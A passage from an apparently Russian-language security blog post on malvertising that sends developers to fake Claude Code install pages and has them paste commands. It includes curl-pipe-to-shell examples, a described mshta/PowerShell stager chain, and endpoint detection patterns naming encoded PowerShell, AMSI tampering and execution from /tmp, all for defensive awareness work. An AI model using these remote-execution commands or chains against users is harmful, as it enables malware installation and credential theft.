mshta.exe  -&gt; remote HTA\/script  -&gt; cmd.exe \/ powershell stager  -&gt; fileless payload  -&gt; persistence \/ credential theft<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0412 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u0432\u043e\u043a\u0440\u0443\u0433 Claude Code \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 <code>mshta.exe<\/code>, PowerShell, staged execution, obfuscation, AMSI bypass attempts, browser data theft \u0438 infostealer behavior.<\/p>\n<p>\u0417\u0434\u0435\u0441\u044c \u0432\u0430\u0436\u043d\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u0442\u044c: \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043d\u0435 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0442\u044c <code>setup.exe<\/code>.<\/p>\n<p>\u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0441\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0434\u0442\u044f\u043d\u0435\u0442 \u0432\u0441\u0435 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u043e\u0435.<\/p>\n<p>\u0418 \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 security controls \u044d\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043d\u0435 \u043a\u0430\u043a \u201c\u0444\u0430\u0439\u043b \u0438\u0437 \u043f\u043e\u0447\u0442\u044b\u201d, \u0430 \u043a\u0430\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0430\u044f terminal activity.<\/p>\n<h3>macOS\/Linux-\u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439: curl-to-shell<\/h3>\n<p>\u041d\u0430 macOS\/Linux \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u044b\u0439 \u043f\u0430\u0442\u0442\u0435\u0440\u043d \u0434\u0440\u0443\u0433\u043e\u0439:<\/p>\n<pre><code class=\"bash\">curl -fsSL https:\/\/example.com\/install.sh | sh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0438\u043b\u0438:<\/p>\n<pre><code class=\"bash\">curl -fsSL https:\/\/example.com\/install.sh | zsh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u042d\u0442\u043e \u0443\u0434\u043e\u0431\u043d\u043e.<\/p>\n<p>\u0418 \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043f\u0430\u0441\u043d\u043e.<\/p>\n<p>\u0422\u0430\u043a\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0433\u043e\u0432\u043e\u0440\u0438\u0442:<\/p>\n<pre><code>\u0441\u043a\u0430\u0447\u0430\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 script \u0438 \u0441\u0440\u0430\u0437\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438 \u0435\u0433\u043e<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0415\u0441\u043b\u0438 \u0434\u043e\u043c\u0435\u043d \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0438 script \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u044b\u0439, \u044d\u0442\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 developer workflow.<\/p>\n<p>\u0415\u0441\u043b\u0438 \u0434\u043e\u043c\u0435\u043d \u043f\u043e\u0434\u043c\u0435\u043d\u0435\u043d, \u044d\u0442\u043e remote code execution \u0440\u0443\u043a\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.<\/p>\n<p>\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0435 \u0432 <code>curl<\/code>.<\/p>\n<p>\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e trust boundary \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432:<\/p>\n<pre><code>\u044f \u0434\u043e\u0432\u0435\u0440\u044f\u044e \u044d\u0442\u043e\u0439 web-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u0438 \u0435\u0435 copy button<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0410 \u044d\u0442\u043e \u0441\u043b\u0430\u0431\u0430\u044f \u0433\u0440\u0430\u043d\u0438\u0446\u0430.<\/p>\n<h3>\u041f\u043e\u0447\u0435\u043c\u0443 sponsored result \u043e\u043f\u0430\u0441\u043d\u0435\u0435, \u0447\u0435\u043c \u043a\u0430\u0436\u0435\u0442\u0441\u044f<\/h3>\n<p>\u041c\u043d\u043e\u0433\u0438\u0435 \u043b\u044e\u0434\u0438 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0432\u043e\u0441\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 Google Ads \u043a\u0430\u043a \u0447\u0442\u043e-\u0442\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0435.<\/p>\n<p>\u041b\u043e\u0433\u0438\u043a\u0430 \u0442\u0430\u043a\u0430\u044f:<\/p>\n<pre><code>\u0435\u0441\u043b\u0438 \u0441\u0441\u044b\u043b\u043a\u0430 \u0432\u0432\u0435\u0440\u0445\u0443 Google, \u043d\u0430\u0432\u0435\u0440\u043d\u043e\u0435, \u044d\u0442\u043e \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u042d\u0442\u043e \u043f\u043b\u043e\u0445\u0430\u044f \u044d\u0432\u0440\u0438\u0441\u0442\u0438\u043a\u0430.<\/p>\n<p>Malvertising \u043a\u0430\u043a \u0440\u0430\u0437 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0441\u0430\u043c \u0438\u0449\u0435\u0442 \u043d\u0443\u0436\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442. \u041d\u0435\u0442 phishing email. \u041d\u0435\u0442 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f. \u041d\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0432 \u043c\u0435\u0441\u0441\u0435\u043d\u0434\u0436\u0435\u0440\u0435.<\/p>\n<p>\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u043b \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u0441\u0430\u043c.<\/p>\n<p>\u0418 \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0441\u0438\u0445\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438 \u043c\u0435\u043d\u044c\u0448\u0435 \u043d\u0430\u0441\u0442\u043e\u0440\u043e\u0436\u0435\u043d.<\/p>\n<p>Push Security \u043e\u0442\u043c\u0435\u0447\u0430\u043b\u0438, \u0447\u0442\u043e fake install pages \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0438\u0441\u044c \u0447\u0435\u0440\u0435\u0437 sponsored search results \u043f\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430\u043c \u0432\u0440\u043e\u0434\u0435 <code>Claude Code<\/code>, <code>Claude Code install<\/code>, <code>Claude Code CLI<\/code>. Kaspersky \u0442\u043e\u0436\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u043b similar flow: \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0438\u0449\u0435\u0442 Claude Code download, \u0432\u0438\u0434\u0438\u0442 sponsored link \u0438 \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u043d\u0430 fake documentation.<\/p>\n<p>\u0414\u043b\u044f \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u044b \u044d\u0442\u043e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e.<\/p>\n<p>\u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e employee \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443, \u0433\u0434\u0435 \u0435\u0441\u0442\u044c:<\/p>\n<ul>\n<li>\n<p>source code;<\/p>\n<\/li>\n<li>\n<p>SSH keys;<\/p>\n<\/li>\n<li>\n<p>browser sessions;<\/p>\n<\/li>\n<li>\n<p>password manager session;<\/p>\n<\/li>\n<li>\n<p>Git credentials;<\/p>\n<\/li>\n<li>\n<p>cloud CLI tokens;<\/p>\n<\/li>\n<li>\n<p>kubeconfig;<\/p>\n<\/li>\n<li>\n<p>CI\/CD access;<\/p>\n<\/li>\n<li>\n<p>internal docs;<\/p>\n<\/li>\n<li>\n<p>VPN access.<\/p>\n<\/li>\n<\/ul>\n<p>Infostealer \u043d\u0430 \u0442\u0430\u043a\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u2014 \u044d\u0442\u043e \u0443\u0436\u0435 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u201c\u043b\u0438\u0447\u043d\u044b\u0439 \u043d\u043e\u0443\u0442\u0431\u0443\u043a \u0437\u0430\u0440\u0430\u0437\u0438\u043b\u0441\u044f\u201d.<\/p>\n<p>\u042d\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0439 \u0432\u0445\u043e\u0434 \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044e.<\/p>\n<h3>\u0427\u0435\u043c \u044d\u0442\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e fake installer<\/h3>\n<p>\u041a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u0438\u0439 fake installer \u0447\u0430\u0441\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:<\/p>\n<pre><code>\u0441\u043a\u0430\u0447\u0430\u0439\u0442\u0435 setup.exe\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0435 installer\u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0435 malware<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>InstallFix \u0442\u043e\u043d\u044c\u0448\u0435.<\/p>\n<p>\u041e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0443\u044e developer-\u043f\u0440\u0438\u0432\u044b\u0447\u043a\u0443:<\/p>\n<pre><code>\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443\u044f \u043a\u043e\u043f\u0438\u0440\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0414\u043b\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u044d\u0442\u043e \u043d\u0435 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u201c\u044f \u0441\u043a\u0430\u0447\u0430\u043b \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 exe\u201d.<\/p>\n<p>\u042d\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u201c\u044f \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043b CLI tool \u043f\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438\u201d.<\/p>\n<p>\u041f\u043e\u044d\u0442\u043e\u043c\u0443 awareness \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u043e \u201c\u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0439\u0442\u0435 exe \u0438\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430\u201d.<\/p>\n<p>\u041d\u0443\u0436\u043d\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0433\u043e\u0432\u0430\u0440\u0438\u0432\u0430\u0442\u044c:<\/p>\n<pre><code>terminal commands \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0442\u043e\u0436\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f code execution<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h3>\u0427\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u043f\u0435\u0440\u0435\u0434 \u0437\u0430\u043f\u0443\u0441\u043a\u043e\u043c install-\u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/h3>\n<p>\u041c\u0438\u043d\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0439 checklist \u0434\u043b\u044f \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430:<\/p>\n<ol>\n<li>\n<p>\u041d\u0435 \u043a\u043b\u0438\u043a\u0430\u0442\u044c sponsored result \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 dev tools.<\/p>\n<\/li>\n<li>\n<p>\u041e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c official docs \u0438\u0437 known source.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0434\u043e\u043c\u0435\u043d \u0432 \u0441\u0430\u043c\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u0435, \u0430 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 address bar.<\/p>\n<\/li>\n<li>\n<p>\u041f\u043e\u0441\u043b\u0435 paste \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0434\u043e Enter.<\/p>\n<\/li>\n<li>\n<p>\u041d\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c <code>curl | sh<\/code>, \u0435\u0441\u043b\u0438 \u043d\u0435 \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f.<\/p>\n<\/li>\n<li>\n<p>\u041f\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u043a\u0430\u0447\u0430\u0442\u044c script \u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0435\u0433\u043e:<\/p>\n<\/li>\n<\/ol>\n<pre><code class=\"bash\">curl -fsSL https:\/\/official.example\/install.sh -o install.shless install.shsh install.sh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<ol start=\"7\">\n<li>\n<p>\u0414\u043b\u044f \u0441\u043e\u043c\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 tools \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c disposable VM\/container.<\/p>\n<\/li>\n<li>\n<p>\u041d\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 AI tools \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 production secrets.<\/p>\n<\/li>\n<\/ol>\n<p>\u042d\u0442\u043e \u043d\u0435 \u0434\u043e\u043b\u0436\u043d\u043e \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432 \u043f\u0430\u0440\u0430\u043d\u043e\u0439\u044e.<\/p>\n<p>\u041d\u043e \u0435\u0441\u043b\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 remote script, \u044d\u0442\u043e \u0443\u0436\u0435 \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430.<\/p>\n<p>\u041a \u044d\u0442\u043e\u043c\u0443 \u043d\u0430\u0434\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.<\/p>\n<h3>\u0427\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/h3>\n<p>\u041e\u0434\u043d\u043e\u0433\u043e awareness \u043c\u0430\u043b\u043e.<\/p>\n<p>\u042f \u0431\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 controls.<\/p>\n<h4>Internal allowlist \u0434\u043b\u044f developer tools<\/h4>\n<p>\u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043e\u043b\u0436\u043d\u0430 \u0437\u043d\u0430\u0442\u044c, \u043e\u0442\u043a\u0443\u0434\u0430 \u0441\u0442\u0430\u0432\u044f\u0442\u0441\u044f approved tools.<\/p>\n<p>\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440:<\/p>\n<pre><code>Claude Code:  official docs: https:\/\/docs.anthropic.com\/...  package: @anthropic-ai\/claude-codeNode:  official: https:\/\/nodejs.org\/  internal mirror: https:\/\/nexus.example.com\/...Homebrew:  official: https:\/\/brew.sh\/<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0415\u0441\u043b\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u043d\u0430\u0445\u043e\u0434\u0438\u0442 install guide \u0447\u0435\u0440\u0435\u0437 Google Ads, \u044d\u0442\u043e \u0443\u0436\u0435 \u043f\u043e\u0432\u043e\u0434 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f.<\/p>\n<h4>Internal docs<\/h4>\n<p>\u0414\u043b\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 tools \u043b\u0443\u0447\u0448\u0435 \u0438\u043c\u0435\u0442\u044c \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u044e\u044e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443:<\/p>\n<pre><code>\u043a\u0430\u043a \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c\u043a\u0430\u043a\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u043a\u0430\u043a\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u043e\u0436\u0438\u0434\u0430\u0435\u0442\u0441\u044f\u043a\u0430\u043a\u043e\u0439 hash\/signature \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c\u043a\u0443\u0434\u0430 \u043f\u0438\u0441\u0430\u0442\u044c, \u0435\u0441\u043b\u0438 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u042d\u0442\u043e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f AI tools, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043b\u044e\u0434\u0438 \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u0431\u0443\u0434\u0443\u0442 \u0438\u0445 \u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c.<\/p>\n<p>\u0415\u0441\u043b\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0434\u0430\u0435\u0442 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u043f\u0443\u0442\u044c, \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0438 \u043d\u0430\u0439\u0434\u0443\u0442 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439.<\/p>\n<h4>DNS\/SWG controls<\/h4>\n<p>\u041c\u043e\u0436\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c:<\/p>\n<ul>\n<li>\n<p>newly registered domains;<\/p>\n<\/li>\n<li>\n<p>suspicious lookalike domains;<\/p>\n<\/li>\n<li>\n<p>known malicious domains;<\/p>\n<\/li>\n<li>\n<p>ad-delivered installer pages;<\/p>\n<\/li>\n<li>\n<p>direct access \u043a suspicious payload hosts.<\/p>\n<\/li>\n<\/ul>\n<p>\u042d\u0442\u043e \u043d\u0435 \u0441\u0435\u0440\u0435\u0431\u0440\u044f\u043d\u0430\u044f \u043f\u0443\u043b\u044f, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e attackers \u0431\u044b\u0441\u0442\u0440\u043e \u043c\u0435\u043d\u044f\u044e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443.<\/p>\n<p>\u041d\u043e \u043a\u0430\u043a \u0441\u043b\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u043f\u043e\u043b\u0435\u0437\u043d\u043e.<\/p>\n<h4>Endpoint detections<\/h4>\n<p>\u041d\u0430 Windows \u044f \u0431\u044b \u0441\u043c\u043e\u0442\u0440\u0435\u043b \u043d\u0430 \u0442\u0430\u043a\u0438\u0435 behavioral patterns:<\/p>\n<pre><code>browser -&gt; powershellbrowser -&gt; cmdpowershell -&gt; mshtamshta -&gt; cmdmshta -&gt; powershellpowershell -EncodedCommandPowerShell AMSI tamperingnew scheduled task near install activityunexpected outbound from scripting hosts<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u0441\u0435\u0449\u0435\u043d\u0438\u044f install page.<\/p>\n<p>\u0414\u043b\u044f macOS\/Linux:<\/p>\n<pre><code>shell spawned from browser-adjacent activitycurl\/wget downloading executable\/script to \/tmpxattr -c on downloaded binarychmod +x on fresh downloadexecution from \/tmpunexpected persistence agents<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041a\u043e\u043d\u0442\u0435\u043a\u0441\u0442 \u0432\u0430\u0436\u0435\u043d.<\/p>\n<p><code>curl<\/code> \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 malware.<\/p>\n<p><code>PowerShell<\/code> \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 malware.<\/p>\n<p>\u041d\u043e browser-driven install flow + suspicious domain + obfuscated command + persistence \u2014 \u044d\u0442\u043e \u0443\u0436\u0435 \u0434\u0440\u0443\u0433\u043e\u0439 \u0440\u0430\u0437\u0433\u043e\u0432\u043e\u0440.<\/p>\n<h3>\u0427\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432 CI\/CD \u0438 AppSec-\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u0445<\/h3>\n<p>\u041d\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u0432\u0437\u0433\u043b\u044f\u0434 \u044d\u0442\u043e endpoint\/security awareness \u0442\u0435\u043c\u0430.<\/p>\n<p>\u041d\u043e \u0434\u043b\u044f AppSec\/DevSecOps \u043e\u043d\u0430 \u0442\u043e\u0436\u0435 \u0432\u0430\u0436\u043d\u0430.<\/p>\n<p>Developer machines \u0447\u0430\u0441\u0442\u043e \u0438\u043c\u0435\u044e\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043f\u043e\u0441\u0442\u0430\u0432\u043a\u0438:<\/p>\n<ul>\n<li>\n<p>Git repositories;<\/p>\n<\/li>\n<li>\n<p>package registries;<\/p>\n<\/li>\n<li>\n<p>container 